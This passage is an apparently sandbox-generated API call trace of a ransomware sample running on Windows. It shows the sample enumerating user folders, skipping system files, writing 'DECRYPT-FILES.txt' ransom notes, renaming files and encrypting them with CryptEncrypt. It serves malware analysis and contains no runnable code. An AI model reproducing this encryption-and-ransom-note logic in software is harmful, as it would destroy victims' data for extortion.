lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.135] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.135] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.135] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.135] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.135] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.135] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.136] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.136] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.136] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.136] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.136] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.136] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.136] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.136] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.136] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 79 [0078.136] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9") returned 84 [0078.136] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.ehk9"), dwFlags=0x0) returned 1 [0078.137] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.139] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.139] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.140] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac14f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.140] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.140] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.140] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.140] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.140] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.140] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.140] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0078.140] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.140] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0078.140] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\jkbimi8.tmp" [0078.140] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.141] CloseHandle (hObject=0x0) returned 0 [0078.141] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.141] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="DECRYPT-FILES.txt") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="autorun.inf") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="boot.ini") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="desktop.ini") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="iconcache.db") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="bootsect.bak") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat.log") returned 1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="thumbs.db") returned -1 [0078.141] lstrcmpiW (lpString1="Templates.LNK", lpString2="Bootfont.bin") returned 1 [0078.141] lstrlenW (lpString="Templates.LNK") returned 13 [0078.141] lstrcmpiW (lpString1="LNK", lpString2="lnk") returned 0 [0078.141] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0078.141] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.141] CloseHandle (hObject=0x450) returned 1 [0078.142] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90b3d80, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent\\", cAlternateFileName="")) returned 0 [0078.142] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.142] CloseHandle (hObject=0x448) returned 1 [0078.142] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0078.142] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0078.142] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0078.142] lstrcatW (in: lpString1="Outlook", lpString2="\\" | out: lpString1="Outlook\\") returned="Outlook\\" [0078.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Program Files") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch=":\\Windows") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Games\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\All Users") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="AhnLab") returned 0x0 [0078.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.142] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.142] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\jkbimi8.tmp") returned 76 [0078.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.144] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.144] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\DECRYPT-FILES.txt") returned 82 [0078.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.144] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.145] CloseHandle (hObject=0x44c) returned 1 [0078.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0078.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xaac611c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac611c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.146] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xaac611c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac611c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.146] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac611c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac611c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac611c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.146] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.146] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac611c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac611c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac611c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.146] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.146] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.146] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.146] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.146] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.146] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.146] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.146] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0078.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\jkbimi8.tmp" [0078.147] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.147] CloseHandle (hObject=0x0) returned 0 [0078.147] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.147] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5de69980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5de69980, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5e0c9040, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="DECRYPT-FILES.txt") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="autorun.inf") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="boot.ini") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="desktop.ini") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="iconcache.db") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="bootsect.bak") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat.log") returned 1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="thumbs.db") returned -1 [0078.147] lstrcmpiW (lpString1="Outlook.srs", lpString2="Bootfont.bin") returned 1 [0078.147] lstrlenW (lpString="Outlook.srs") returned 11 [0078.148] lstrcmpiW (lpString1="srs", lpString2="lnk") returned 1 [0078.148] lstrcmpiW (lpString1="srs", lpString2="exe") returned 1 [0078.148] lstrcmpiW (lpString1="srs", lpString2="sys") returned -1 [0078.148] lstrcmpiW (lpString1="srs", lpString2="dll") returned 1 [0078.148] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.148] lstrlenW (lpString="Outlook.srs") returned 11 [0078.148] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0078.148] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.srs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" [0078.148] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.149] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=2560) returned 1 [0078.149] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.149] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.150] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.150] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.150] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.150] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.150] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.151] VirtualFree (lpAddress=0x10e0000, 